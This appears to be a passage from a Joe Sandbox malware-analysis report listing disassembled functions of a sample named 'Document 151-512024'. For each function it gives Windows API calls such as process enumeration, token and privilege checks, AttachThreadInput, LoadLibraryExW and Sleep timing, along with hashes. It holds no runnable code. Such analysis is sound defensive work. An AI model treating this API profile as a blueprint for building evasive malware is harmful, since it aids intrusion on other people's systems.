Function 009D16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009D16EB

Part of subcall function 009A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009A3A57
Part of subcall function 009A3A3D: GetCurrentThreadId.KERNEL32 ref: 009A3A5E
Part of subcall function 009A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009A25B3), ref: 009A3A65

GetCaretPos.USER32(?), ref: 009D16FF
ClientToScreen.USER32(00000000,?), ref: 009D174C
GetForegroundWindow.USER32 ref: 009D1752

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 3de5ac193eb9df274e94c36878ece386ff713bd68b69041b023a4e35605e74d7
Instruction ID: df10ea597d92acb06cfe8fa0fe0fec52f666de6a7183d219a69396e9011df964
Opcode Fuzzy Hash: 3de5ac193eb9df274e94c36878ece386ff713bd68b69041b023a4e35605e74d7
Instruction Fuzzy Hash: B3314FB5D01249AFC704EFA9C881DAEBBFDEF89304B5080AAE415E7211D735DE45CBA0

Function 009AD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009AD501
Process32FirstW.KERNEL32(00000000,?), ref: 009AD50F
Process32NextW.KERNEL32(00000000,?), ref: 009AD52F
CloseHandle.KERNEL32(00000000), ref: 009AD5DC

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 1aaaa85780418d799500c292283fc6a4f05e31e8fe1e3b1c5c3ca5aa434e8c60
Instruction ID: ce51afbb9362db6ee05d10715258e429b8ea194cab396ae4ca718f276f1d3d14
Opcode Fuzzy Hash: 1aaaa85780418d799500c292283fc6a4f05e31e8fe1e3b1c5c3ca5aa434e8c60
Instruction Fuzzy Hash: 4D3181711083019FD305EF54D885FAFBBE8EFDA354F14092DF586862A2EB719948CB92

Function 009AD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,009DCB68), ref: 009AD2FB
GetLastError.KERNEL32 ref: 009AD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 009AD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,009DCB68), ref: 009AD376

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 41598184303fea91cb752a7c0a18b4e9777522ac6bd1c4a6abd2ff5be47f1c74
Instruction ID: cf6fad0e10e1de0c014d3f31af56b9495e32010211c34b104a8eda6dbec8694c
Opcode Fuzzy Hash: 41598184303fea91cb752a7c0a18b4e9777522ac6bd1c4a6abd2ff5be47f1c74
Instruction Fuzzy Hash: E721567054A2029F8710DF28C88196EB7E8EF97758F504A1EF4A6C72A1DB31D945CBD3

Function 009A1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009A102A
Part of subcall function 009A1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009A1036
Part of subcall function 009A1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009A1045
Part of subcall function 009A1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009A104C
Part of subcall function 009A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009A1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009A15BE
_memcmp.LIBVCRUNTIME ref: 009A15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A1617
HeapFree.KERNEL32(00000000), ref: 009A161E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 592bd48f9894aa4594c3d486b0246295fa646de096ae8ebd341e998d8c1d5c07
Instruction ID: 91002d1d95757c7077ff6ed25f1262db7adf2688837f88a4b900ab102c8a480a
Opcode Fuzzy Hash: 592bd48f9894aa4594c3d486b0246295fa646de096ae8ebd341e998d8c1d5c07
Instruction Fuzzy Hash: FF21AC71E41109EFDF04DFA4C949BEEB7B8EF86344F084459E441EB241E730AA45DBA0

Function 009D2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 009D280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009D2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009D2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009D2840

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: e6147774f9acf85e0dd08c8abd6646856469140a665fd5fdf447522d22f75836
Instruction ID: 38195a8c68544721894e9368fc8242b6b0cecfccbc13cbfb208411d391ecc167
Opcode Fuzzy Hash: e6147774f9acf85e0dd08c8abd6646856469140a665fd5fdf447522d22f75836
Instruction Fuzzy Hash: B821D331289112AFD7149B24C844FAA7B99EF95324F14825AF4268B7E2C775FC82CB90

Function 009A78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009A8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,009A790A,?,000000FF,?,009A8754,00000000,?,0000001C,?,?), ref: 009A8D8C
Part of subcall function 009A8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 009A8DB2
Part of subcall function 009A8D7D: lstrcmpiW.KERNEL32(00000000,?,009A790A,?,000000FF,?,009A8754,00000000,?,0000001C,?,?), ref: 009A8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009A8754,00000000,?,0000001C,?,?,00000000), ref: 009A7923
lstrcpyW.KERNEL32(00000000,?), ref: 009A7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,009A8754,00000000,?,0000001C,?,?,00000000), ref: 009A7984

Strings

cdecl, xrefs: 009A797B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d2b7cb5ae77494ec3a5096c019809bfa7dc6caeeeaa06a3a5069e48e1f268181
Instruction ID: 74be0b90bd47175bb13fda31dd773b19ab7c1ca216b7a682f8d1ec89f8cf7d63
Opcode Fuzzy Hash: d2b7cb5ae77494ec3a5096c019809bfa7dc6caeeeaa06a3a5069e48e1f268181
Instruction Fuzzy Hash: BB11063A205202AFCB159F75DC46E7BB7A9FFC6390B00402BF802C72A4EB319811D791

Function 009D7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 009D7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 009D7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009D7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009BB7AD,00000000), ref: 009D7D6B

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: ada34c705c7c76d853ce052dc9d850e790e6a7131a4b33c0a7f5ce00110a5a7a
Instruction ID: 162fe583d30e90d4d70826304890d5e04862803f3e64ae21d2313903287ed018
Opcode Fuzzy Hash: ada34c705c7c76d853ce052dc9d850e790e6a7131a4b33c0a7f5ce00110a5a7a
Instruction Fuzzy Hash: 4D11DF35259615AFCB108FA8CC04AA67BAAAF46370B11C726F93AC73F0E7308951DB50

Function 009D5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 009D56BB
_wcslen.LIBCMT ref: 009D56CD
_wcslen.LIBCMT ref: 009D56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 009D5816

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: a9a1b5856020c2c5754cdbd28a7f898f8ba102a5fd7f37cf461044b6ce0e000e
Instruction ID: 12c64ed8c0ee64a10662725c8b9bb76107e656e453b8736d87e9d628190d8812
Opcode Fuzzy Hash: a9a1b5856020c2c5754cdbd28a7f898f8ba102a5fd7f37cf461044b6ce0e000e
Instruction Fuzzy Hash: BD11D67568060996DF20DFA5CC85AFE776CEF50760B50C42BF915D6281EB74C984CF60

Function 009A1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 009A1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009A1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009A1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009A1A8A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6c1952264417da3fbbadfd9fd1597d898c25e244ceac692c0157cc287c4897c0
Instruction ID: 265ea7a6d33e40a0e6fb9f5fa0e4c6c6b8f8f9d717ea7bfe0455253fe6fed971
Opcode Fuzzy Hash: 6c1952264417da3fbbadfd9fd1597d898c25e244ceac692c0157cc287c4897c0
Instruction Fuzzy Hash: 1D113C3AD01219FFEF10DBA4CD85FADBB78EB04750F200091E600B7290D6716E50DB94

Function 009AE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009AE1FD
MessageBoxW.USER32(?,?,?,?), ref: 009AE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009AE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009AE24D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: e21fff301a0ef5b33a309128c31897b531fbebd4f46fc0d215f34804dc7aa60f
Instruction ID: 08093265a329decdd8a8b91ee7d0ada2cd9d2fcd48e6c38b1115945b3300126a
Opcode Fuzzy Hash: e21fff301a0ef5b33a309128c31897b531fbebd4f46fc0d215f34804dc7aa60f
Instruction Fuzzy Hash: 5D11C8B6909259BBC711DBE89C09BDE7FADDB46310F048256F934E7291D674890487A0

Function 0096D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0096CFF9,00000000,00000004,00000000), ref: 0096D218
GetLastError.KERNEL32 ref: 0096D224
__dosmaperr.LIBCMT ref: 0096D22B
ResumeThread.KERNEL32(00000000), ref: 0096D249

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 449af20f23bcf3135f056e464c10ab7aa5c9efb1370df39d1227a67c8ff7f659
Instruction ID: 2f8f67c6c23b82c92f99a12e61f75b49c4935bf13c52619c027ccbf67470f209
Opcode Fuzzy Hash: 449af20f23bcf3135f056e464c10ab7aa5c9efb1370df39d1227a67c8ff7f659
Instruction Fuzzy Hash: 05012276E0A204BBCB105BA5DC19BAA7B6CEFC2330F104219F834921D0CB71C941D6A0

Function 0094600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0094604C
GetStockObject.GDI32(00000011), ref: 00946060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0094606A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: d7cac07f23b932988770b854d1d3c1efe5ec0d7709bd5095e866d707d19f8741
Instruction ID: c9275adb4b25af8f34ecab4e2cede1f366109e91e63782861561c02033705774
Opcode Fuzzy Hash: d7cac07f23b932988770b854d1d3c1efe5ec0d7709bd5095e866d707d19f8741
Instruction Fuzzy Hash: 28116DF2506509BFEF129FA5DC44EEABB6DEF093A5F040216FA1452110D736DCA0EBA1

Function 00963B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00963B56

Part of subcall function 00963AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00963AD2
Part of subcall function 00963AA3: ___AdjustPointer.LIBCMT ref: 00963AED

_UnwindNestedFrames.LIBCMT ref: 00963B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00963B7C
CallCatchBlock.LIBVCRUNTIME ref: 00963BA4

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: bad7e7b5119f76f8fe3ef557f8d54d9662ceec97d9b0b65997fe0be64f9b2233
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 76014C32100149BBDF125E95CC42EEB3F6DEF89754F048014FE4866121C732E961EBA0

Function 00973073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009413C6,00000000,00000000,?,0097301A,009413C6,00000000,00000000,00000000,?,0097328B,00000006,FlsSetValue), ref: 009730A5
GetLastError.KERNEL32(?,0097301A,009413C6,00000000,00000000,00000000,?,0097328B,00000006,FlsSetValue,009E2290,FlsSetValue,00000000,00000364,?,00972E46), ref: 009730B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0097301A,009413C6,00000000,00000000,00000000,?,0097328B,00000006,FlsSetValue,009E2290,FlsSetValue,00000000), ref: 009730BF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 7ea042501beb4c281b889361a1a58b61fc3f1d689eea0d9458a213528fe34b46
Instruction ID: 21b31d59cb05f887a383aef39ed0d8fc30f4c8f18f659f5f8852cd04bb3e6cab
Opcode Fuzzy Hash: 7ea042501beb4c281b889361a1a58b61fc3f1d689eea0d9458a213528fe34b46
Instruction Fuzzy Hash: B701F7773A6223ABCB314BB89C449577B9CAF05B61B20C720F919E7180D721DD41E6E0

Function 009A7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 009A747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009A7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009A74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009A74CA

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: ee652f991ff1eaea8a1475d429802d864b153923d42512b74e08859c5a86f216
Instruction ID: bb2b675af3b6213e135f62362adaeab952d1a0ed36755e47cdc59b28675e4289
Opcode Fuzzy Hash: ee652f991ff1eaea8a1475d429802d864b153923d42512b74e08859c5a86f216
Instruction Fuzzy Hash: E71104B124A3159FE7208F94DC0AF92BFFDEB04B04F10896AA616D6061D770E944DB90

Function 009AB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009AACD3,?,00008000), ref: 009AB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009AACD3,?,00008000), ref: 009AB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009AACD3,?,00008000), ref: 009AB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009AACD3,?,00008000), ref: 009AB126

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 471d51e5d757035efeae095b2d85963a9bfb1f38655fda02353c0e79baff2889
Instruction ID: 97115b66c992932adfdd29454ed1e1309a778052cd0192f7a62cbd4894d1d350
Opcode Fuzzy Hash: 471d51e5d757035efeae095b2d85963a9bfb1f38655fda02353c0e79baff2889
Instruction Fuzzy Hash: E1118B70C0952DEBCF00AFE4E9686EEBB78FF0A311F004096D941B2186CB344691CB91

Function 009A2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009A2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 009A2DD6
GetCurrentThreadId.KERNEL32 ref: 009A2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009A2DE4

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
